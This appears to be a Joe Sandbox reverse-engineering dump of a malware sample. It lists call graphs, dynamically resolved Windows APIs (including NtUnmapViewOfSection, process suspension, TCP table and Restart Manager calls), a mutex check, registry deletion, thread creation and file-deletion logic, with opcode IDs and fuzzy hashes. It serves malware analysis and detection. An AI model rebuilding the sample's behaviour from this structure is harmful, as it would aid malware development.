47449 41cb50 LoadLibraryA GetProcAddress 47156->47449 47158 40e9e1 GetModuleFileNameW 47454 40f3c3 47158->47454 47160 40e9fd 47469 4020f6 47160->47469 47163 4020f6 28 API calls 47164 40ea1b 47163->47164 47475 41be1b 47164->47475 47168 40ea2d 47501 401e8d 47168->47501 47170 40ea36 47171 40ea93 47170->47171 47172 40ea49 47170->47172 47507 401e65 22 API calls 47171->47507 47531 40fbb3 116 API calls 47172->47531 47175 40ea5b 47532 401e65 22 API calls 47175->47532 47176 40eaa3 47508 401e65 22 API calls 47176->47508 47178 40ea67 47533 410f37 36 API calls __EH_prolog 47178->47533 47180 40eac2 47509 40531e 28 API calls 47180->47509 47183 40ead1 47510 406383 28 API calls 47183->47510 47184 40ea79 47534 40fb64 77 API calls 47184->47534 47187 40eadd 47511 401fe2 47187->47511 47188 40ea82 47535 40f3b0 70 API calls 47188->47535 47194 401fd8 11 API calls 47196 40eefb 47194->47196 47195 401fd8 11 API calls 47197 40eafb 47195->47197 47426 4432f6 GetModuleHandleW 47196->47426 47523 401e65 22 API calls 47197->47523 47199 40eb04 47524 401fc0 28 API calls 47199->47524 47201 40eb0f 47525 401e65 22 API calls 47201->47525 47203 40eb28 47526 401e65 22 API calls 47203->47526 47205 40eb43 47206 40ebae 47205->47206 47536 406c1e 28 API calls 47205->47536 47527 401e65 22 API calls 47206->47527 47209 40eb70 47210 401fe2 28 API calls 47209->47210 47211 40eb7c 47210->47211 47212 401fd8 11 API calls 47211->47212 47215 40eb85 47212->47215 47213 40ec02 47528 40d069 47213->47528 47214 40ebbb 47214->47213 47538 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47214->47538 47537 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47215->47537 47217 40ec08 47218 40ea8b 47217->47218 47540 41b2c3 33 API calls 47217->47540 47218->47194 47221 40eba4 47221->47206 47223 40f34f 47221->47223 47623 4139a9 30 API calls 47223->47623 47224 40ec23 47226 40ec76 47224->47226 47541 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47224->47541 47225 40ebe6 47225->47213 47539 4139a9 30 API calls 47225->47539 47546 401e65 22 API calls 47226->47546 47231 40ec7f 47239 40ec90 47231->47239 47240 40ec8b 47231->47240 47232 40ec3e 47234 40ec42 47232->47234 47235 40ec4c 47232->47235 47233 40f365 47624 412475 65 API calls ___scrt_fastfail 47233->47624 47542 407738 30 API calls 47234->47542 47544 401e65 22 API calls 47235->47544 47548 401e65 22 API calls 47239->47548 47547 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47240->47547 47241 40ec47 47543 407260 97 API calls 47241->47543 47243 40f37f 47626 413a23 RegOpenKeyExW RegDeleteValueW 47243->47626 47247 40ec99 47549 41bc5e 28 API calls 47247->47549 47248 40ec55 47248->47226 47253 40ec71 47248->47253 47251 40eca4 47550 401f13 28 API calls 47251->47550 47545 407260 97 API calls 47253->47545 47254 40f392 47627 401f09 11 API calls 47254->47627 47255 40ecaf 47551 401f09 11 API calls 47255->47551 47259 40f39c 47628 401f09 11 API calls 47259->47628 47260 40ecb8 47552 401e65 22 API calls 47260->47552 47263 40f3a5 47629 40dd42 27 API calls 47263->47629 47264 40ecc1 47553 401e65 22 API calls 47264->47553 47266 40f3aa 47630 414f2a 167 API calls _strftime 47266->47630 47270 40ecdb 47554 401e65 22 API calls 47270->47554 47272 40ecf5 47555 401e65 22 API calls 47272->47555 47274 40ed80 47277 40ed8a 47274->47277 47283 40ef06 ___scrt_fastfail 47274->47283 47275 40ed0e 47275->47274 47556 401e65 22 API calls 47275->47556 47278 40ed93 47277->47278 47285 40ee0f 47277->47285 47562 401e65 22 API calls 47278->47562 47280 40ed9c 47563 401e65 22 API calls 47280->47563 47281 40ed23 _wcslen 47281->47274 47557 401e65 22 API calls 47281->47557 47573 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47283->47573 47284 40edae 47564 401e65 22 API calls 47284->47564 47308 40ee0a ___scrt_fastfail 47285->47308 47287 40ed3e 47558 401e65 22 API calls 47287->47558 47291 40edc0 47565 401e65 22 API calls 47291->47565 47292 40ed53 47559 40da34 31 API calls 47292->47559 47293 40ef51 47574 401e65 22 API calls 47293->47574 47297 40ede9 47566 401e65 22 API calls 47297->47566 47298 40ef76 47575 402093 28 API calls 47298->47575 47299 40ed66 47560 401f13 28 API calls 47299->47560 47302 40ed72 47561 401f09 11 API calls 47302->47561 47304 40ef88 47576 41376f 14 API calls 47304->47576 47306 40edfa 47567 40cdf9 45 API calls _wcslen 47306->47567 47307 40ed7b 47307->47274 47308->47285 47568 413947 31 API calls 47308->47568 47312 40ef9e 47577 401e65 22 API calls 47312->47577 47313 40eea3 ctype 47569 401e65 22 API calls 47313->47569 47315 40efaa 47578 43baac 39 API calls _strftime 47315->47578 47318 40efb7 47320 40efe4 47318->47320 47579 41cd9b 86 API calls ___scrt_fastfail 47318->47579 47319 40eeba 47319->47293 47570 401e65 22 API calls 47319->47570 47580 402093 28 API calls 47320->47580 47322 40eed7 47571 41bc5e 28 API calls 47322->47571 47324 40efc8 CreateThread 47324->47320 47741 41d45d 10 API calls 47324->47741 47327 40eff9 47581 402093 28 API calls 47327->47581 47328 40eee3 47572 40f474 103 API calls 47328->47572 47331 40f008 47582 41b4ef 79 API calls 47331->47582 47332 40eee8 47332->47293 47334 40eeef 47332->47334 47334->47218 47335 40f00d 47583 401e65 22 API calls 47335->47583 47337 40f019 47584 401e65 22 API calls 47337->47584 47339 40f02b 47585 401e65 22 API calls 47339->47585 47341 40f04b 47586 43baac 39 API calls _strftime 47341->47586 47343 40f058 47587 401e65 22 API calls 47343->47587 47345 40f063 47588 401e65 22 API calls 47345->47588 47347 40f074 47589 401e65 22 API calls 47347->47589 47349 40f089 47590 401e65 22 API calls 47349->47590 47351 40f09a 47352 40f0a1 StrToIntA 47351->47352 47591 409de4 169 API calls _wcslen 47352->47591 47354 40f0b3 47592 401e65 22 API calls 47354->47592 47356 40f101 47601 401e65 22 API calls 47356->47601 47357 40f0bc 47357->47356 47593 4344ea 47357->47593 47362 40f0e4 47363 40f0eb CreateThread 47362->47363 47363->47356 47736 419fb4 102 API calls 2 library calls 47363->47736 47364 40f159 47603 401e65 22 API calls 47364->47603 47365 40f111 47365->47364 47367 4344ea new 22 API calls 47365->47367 47368 40f126 47367->47368 47602 401e65 22 API calls 47368->47602 47370 40f138 47373 40f13f CreateThread 47370->47373 47371 40f1cc 47609 401e65 22 API calls 47371->47609 47372 40f162 47372->47371 47604 401e65 22 API calls 47372->47604 47373->47364 47742 419fb4 102 API calls 2 library calls 47373->47742 47376 40f17e 47605 401e65 22 API calls 47376->47605 47377 40f1d5 47378 40f21a 47377->47378 47610 401e65 22 API calls 47377->47610 47614 41b60d 79 API calls 47378->47614 47382 40f193 47606 40d9e8 31 API calls 47382->47606 47383 40f223 47615 401f13 28 API calls 47383->47615 47384 40f1ea 47611 401e65 22 API calls 47384->47611 47387 40f22e 47616 401f09 11 API calls 47387->47616 47389 40f1a6 47607 401f13 28 API calls 47389->47607 47391 40f1ff 47612 43baac 39 API calls _strftime 47391->47612 47393 40f237 CreateThread 47396 40f264 47393->47396 47397 40f258 CreateThread 47393->47397 47737 40f7a7 120 API calls 47393->47737 47394 40f1b2 47608 401f09 11 API calls 47394->47608 47399 40f279 47396->47399 47400 40f26d CreateThread 47396->47400 47397->47396 47738 4120f7 137 API calls 47397->47738 47404 40f2cc 47399->47404 47617 402093 28 API calls 47399->47617 47400->47399 47739 4126db 38 API calls ___scrt_fastfail 47400->47739 47402 40f1bb CreateThread 47402->47371 47740 401be9 49 API calls _strftime 47402->47740 47403 40f20c 47613 40c162 7 API calls 47403->47613 47619 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47404->47619 47407 40f29c 47618 4052fd 28 API calls 47407->47618 47410 40f2e4 47410->47263 47620 41bc5e 28 API calls 47410->47620 47416 40f2fd 47621 41361b 31 API calls 47416->47621 47420 40f313 47622 401f09 11 API calls 47420->47622 47422 40f346 DeleteFileW 47423 40f34d 47422->47423 47424 40f31e 47422->47424 47625 41bc5e 28 API calls 47423->47625 47424->47422 47424->47423 47425 40f334 Sleep 47424->47425 47425->47424 47427 434984 47426->47427 47427->47131 47428 44341f 47427->47428 47744 44319c 47428->47744 47431->47113 47432->47117 47433->47123 47434->47120 47435->47133 47436->47119 47437->47139 47438->47141 47439->47144 47440->47142 47442 434b27 GetStartupInfoW 47441->47442 47442->47150 47444 44f06b 47443->47444 47445 44f062 47443->47445 47444->47153 47448 44ef58 48 API calls 4 library calls 47445->47448 47447->47153 47448->47444 47450 41cb8f LoadLibraryA GetProcAddress 47449->47450 47451 41cb7f GetModuleHandleA GetProcAddress 47449->47451 47452 41cbb8 44 API calls 47450->47452 47453 41cba8 LoadLibraryA GetProcAddress 47450->47453 47451->47450 47452->47158 47453->47452 47631 41b4a8 FindResourceA 47454->47631 47458 40f3ed _Yarn 47641 4020b7 47458->47641 47461 401fe2 28 API calls 47462 40f413 47461->47462 47463 401fd8 11 API calls 47462->47463 47464 40f41c 47463->47464 47465 43bd51 _Yarn 21 API calls 47464->47465 47466 40f42d _Yarn 47465->47466 47647 406dd8 47466->47647 47468 40f460 47468->47160 47470 40210c 47469->47470 47471 4023ce 11 API calls 47470->47471 47472 402126 47471->47472 47473 402569 28 API calls 47472->47473 47474 402134 47473->47474 47474->47163 47684 4020df 47475->47684 47477 401fd8 11 API calls 47478 41bed0 47477->47478 47480 401fd8 11 API calls 47478->47480 47479 41bea0 47700 4041a2 28 API calls 47479->47700 47483 41bed8 47480->47483 47485 401fd8 11 API calls 47483->47485 47484 41beac 47486 401fe2 28 API calls 47484->47486 47488 40ea24 47485->47488 47489 41beb5 47486->47489 47487 401fe2 28 API calls 47493 41be2e 47487->47493 47497 40fb17 47488->47497 47490 401fd8 11 API calls 47489->47490 47492 41bebd 47490->47492 47491 401fd8 11 API calls 47491->47493 47494 41ce34 28 API calls 47492->47494 47493->47479 47493->47487 47493->47491 47496 41be9e 47493->47496 47688 4041a2 28 API calls 47493->47688 47689 41ce34 47493->47689 47494->47496 47496->47477 47498 40fb23 47497->47498 47499 40fb2a 47497->47499 47726 402163 11 API calls 47498->47726 47499->47168 47502 402163 47501->47502 47503 40219f 47502->47503 47727 402730 11 API calls 47502->47727 47503->47170 47505 402184 47728 402712 11 API calls std::_Deallocate 47505->47728 47507->47176 47508->47180 47509->47183 47510->47187 47512 401ff1 47511->47512 47519 402039 47511->47519 47513 4023ce 11 API calls 47512->47513 47514 401ffa 47513->47514 47515 40203c 47514->47515 47517 402015 47514->47517 47730 40267a 11 API calls 47515->47730 47729 403098 28 API calls 47517->47729 47520 401fd8 47519->47520 47521 4023ce 11 API calls 47520->47521 47522 401fe1 47521->47522 47522->47195 47523->47199 47524->47201 47525->47203 47526->47205 47527->47214 47731 401fab 47528->47731 47530 40d073 CreateMutexA GetLastError 47530->47217 47531->47175 47532->47178 47533->47184 47534->47188 47536->47209 47537->47221 47538->47225 47539->47213 47540->47224 47541->47232 47542->47241 47543->47235 47544->47248 47545->47226 47546->47231 47547->47239 47548->47247 47549->47251 47550->47255 47551->47260 47552->47264 47553->47270 47554->47272 47555->47275 47556->47281 47557->47287 47558->47292 47559->47299 47560->47302 47561->47307 47562->47280 47563->47284 47564->47291 47565->47297 47566->47306 47567->47308 47568->47313 47569->47319 47570->47322 47571->47328 47572->47332 47573->47293 47574->47298 47575->47304 47576->47312 47577->47315 47578->47318 47579->47324 47580->47327 47581->47331 47582->47335 47583->47337 47584->47339 47585->47341 47586->47343 47587->47345 47588->47347 47589->47349 47590->47351 47591->47354 47592->47357 47599 4344ef 47593->47599 47594 43bd51 _Yarn 21 API calls 47594->47599 47595 40f0d1 47600 401e65 22 API calls 47595->47600 47599->47594 47599->47595 47732 442f80 7 API calls 2 library calls 47599->47732 47733 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47599->47733 47734 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47599->47734 47600->47362 47601->47365 47602->47370 47603->47372 47604->47376 47605->47382 47606->47389 47607->47394 47608->47402 47609->47377 47610->47384 47611->47391 47612->47403 47613->47378 47614->47383 47615->47387 47616->47393 47617->47407 47619->47410 47620->47416 47621->47420 47622->47424 47623->47233 47625->47243 47626->47254 47627->47259 47628->47263 47629->47266 47735 41ad17 104 API calls 47630->47735 47632 41b4c5 LoadResource LockResource SizeofResource 47631->47632 47633 40f3de 47631->47633 47632->47633 47634 43bd51 47633->47634 47639 446137 __Getctype 47634->47639 47635 446175 47651 4405dd 20 API calls __dosmaperr 47635->47651 47637 446160 RtlAllocateHeap 47638 446173 47637->47638 47637->47639 47638->47458 47639->47635 47639->47637 47650 442f80 7 API calls 2 library calls 47639->47650 47642 4020bf 47641->47642 47652 4023ce 47642->47652 47644 4020ca 47656 40250a 47644->47656 47646 4020d9 47646->47461 47648 4020b7 28 API calls 47647->47648 47649 406dec 47648->47649 47649->47468 47650->47639 47651->47638 47653 402428 47652->47653 47654 4023d8 47652->47654 47653->47644 47654->47653 47663 4027a7 11 API calls std::_Deallocate 47654->47663 47657 40251a 47656->47657 47658 402520 47657->47658 47659 402535 47657->47659 47664 402569 47658->47664 47674 4028e8 28 API calls 47659->47674 47662 402533 47662->47646 47663->47653 47675 402888 47664->47675 47666 40257d 47667 402592 47666->47667 47668 4025a7 47666->47668 47680 402a34 22 API calls 47667->47680 47682 4028e8 28 API calls 47668->47682 47671 40259b 47681 4029da 22 API calls 47671->47681 47673 4025a5 47673->47662 47674->47662 47676 402890 47675->47676 47677 402898 47676->47677 47683 402ca3 22 API calls 47676->47683 47677->47666 47680->47671 47681->47673 47682->47673 47685 4020e7 47684->47685 47686 4023ce 11 API calls 47685->47686 47687 4020f2 47686->47687 47687->47493 47688->47493 47690 41ce41 47689->47690 47691 41cea0 47690->47691 47695 41ce51 47690->47695 47692 41ceba 47691->47692 47693 41cfe0 28 API calls 47691->47693 47710 41d146 28 API calls 47692->47710 47693->47692 47697 41ce89 47695->47697 47701 41cfe0 47695->47701 47709 41d146 28 API calls 47697->47709 47699 41ce9c 47699->47493 47700->47484 47703 41cfe8 47701->47703 47702 41d01a 47702->47697 47703->47702 47704 41d01e 47703->47704 47707 41d002 47703->47707 47721 402725 22 API calls 47704->47721 47711 41d051 47707->47711 47709->47699 47710->47699 47712 41d05b __EH_prolog 47711->47712 47722 402717 22 API calls 47712->47722 47714 41d06e 47723 41d15d 11 API calls 47714->47723 47716 41d094 47717 41d0cc 47716->47717 47724 402730 11 API calls 47716->47724 47717->47702 47719 41d0b3 47725 402712 11 API calls std::_Deallocate 47719->47725 47722->47714 47723->47716 47724->47719 47725->47717 47726->47499 47727->47505 47728->47503 47729->47519 47730->47519 47732->47599 47743 4127ee 61 API calls 47738->47743 47745 4431a8 _Atexit 47744->47745 47746 4431c0 47745->47746 47747 4432f6 _Atexit GetModuleHandleW 47745->47747 47766 445888 EnterCriticalSection 47746->47766 47749 4431b4 47747->47749 47749->47746 47778 44333a GetModuleHandleExW 47749->47778 47750 443266 47767 4432a6 47750->47767 47754 44323d 47757 443255 47754->47757 47787 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47754->47787 47755 443283 47770 4432b5 47755->47770 47756 4432af 47789 457729 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47756->47789 47788 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47757->47788 47758 4431c8 47758->47750 47758->47754 47786 443f50 20 API calls _Atexit 47758->47786 47766->47758 47790 4458d0 LeaveCriticalSection 47767->47790 47769 44327f 47769->47755 47769->47756 47791 448cc9 47770->47791 47773 4432e3 47776 44333a _Atexit 8 API calls 47773->47776 47774 4432c3 GetPEB 47774->47773 47775 4432d3 GetCurrentProcess TerminateProcess 47774->47775 47775->47773 47777 4432eb ExitProcess 47776->47777 47779 443364 GetProcAddress 47778->47779 47780 443387 47778->47780 47781 443379 47779->47781 47782 443396 47780->47782 47783 44338d FreeLibrary 47780->47783 47781->47780 47784 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47782->47784 47783->47782 47785 4433a0 47784->47785 47785->47746 47786->47754 47787->47757 47788->47750 47790->47769 47792 448ce4 47791->47792 47793 448cee 47791->47793 47804 434fcb 47792->47804 47797 4484ca 47793->47797 47796 4432bf 47796->47773 47796->47774 47798 4484f6 47797->47798 47799 4484fa 47797->47799 47798->47799 47803 44851a 47798->47803 47811 448566 47798->47811 47799->47792 47801 448526 GetProcAddress 47802 448536 __crt_fast_encode_pointer 47801->47802 47802->47799 47803->47799 47803->47801 47805 434fd6 IsProcessorFeaturePresent 47804->47805 47806 434fd4 47804->47806 47808 435018 47805->47808 47806->47796 47818 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47808->47818 47810 4350fb 47810->47796 47812 448587 LoadLibraryExW 47811->47812 47817 44857c 47811->47817 47813 4485a4 GetLastError 47812->47813 47814 4485bc 47812->47814 47813->47814 47815 4485af LoadLibraryExW 47813->47815 47816 4485d3 FreeLibrary 47814->47816 47814->47817 47815->47814 47816->47817 47817->47798 47818->47810 47819 404e26 WaitForSingleObject 47820 404e40 SetEvent FindCloseChangeNotification 47819->47820 47821 404e57 closesocket 47819->47821 47822 404ed8 47820->47822 47823 404e64 47821->47823 47824 404e7a 47823->47824 47832 4050e4 83 API calls 47823->47832 47826 404e8c WaitForSingleObject 47824->47826 47827 404ece SetEvent CloseHandle 47824->47827 47833 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47826->47833 47827->47822 47829 404e9b SetEvent WaitForSingleObject 47834 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47829->47834 47831 404eb3 SetEvent CloseHandle CloseHandle 47831->47827 47832->47824 47833->47829 47834->47831 47835 40165e 47836 401666 47835->47836 47837 401669 47835->47837 47838 4016a8 47837->47838 47840 401696 47837->47840 47839 4344ea new 22 API calls 47838->47839 47842 40169c 47839->47842 47841 4344ea new 22 API calls 47840->47841 47841->47842

                    Control-flow Graph

                    APIs
                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad$HandleModule
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                    • API String ID: 4236061018-3687161714
                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 465 4432b5-4432c1 call 448cc9 468 4432e3-4432ef call 44333a ExitProcess 465->468 469 4432c3-4432d1 GetPEB 465->469 469->468 470 4432d3-4432dd GetCurrentProcess TerminateProcess 469->470 470->468
                    APIs
                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                    • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                    • ExitProcess.KERNEL32 ref: 004432EF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID: PkGNG
                    • API String ID: 1703294689-263838557
                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 101 40f34f-40f36a call 401fab call 4139a9 call 412475 69->101 80 40ec03 call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 86 40ec08-40ec0a 80->86 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 89 40ec13-40ec1a 86->89 90 40ec0c-40ec0e 86->90 95 40ec1c 89->95 96 40ec1e-40ec2a call 41b2c3 89->96 94 40eef1 90->94 94->49 95->96 103 40ec33-40ec37 96->103 104 40ec2c-40ec2e 96->104 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 101->126 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39-40ec40 call 407716 103->108 104->103 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->127 128 40ec8b call 407755 107->128 120 40ec42-40ec47 call 407738 call 407260 108->120 121 40ec4c-40ec5f call 401e65 call 401fab 108->121 120->121 121->107 140 40ec61-40ec67 121->140 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 140->107 143 40ec69-40ec6f 140->143 143->107 147 40ec71 call 407260 143->147 147->107 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed39 call 401e65 178->205 236 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 184 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->184 185 40ee0f-40ee19 call 409057 181->185 191 40ee1e-40ee42 call 40247c call 434798 184->191 185->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 214 40ed3e-40ed7b call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 205->214 218 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 212->218 213->218 214->177 218->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 218->286 287 40efc1 236->287 288 40efdc-40efde 236->288 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->94 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 357 40f159-40f16c call 401e65 call 401fab 347->357 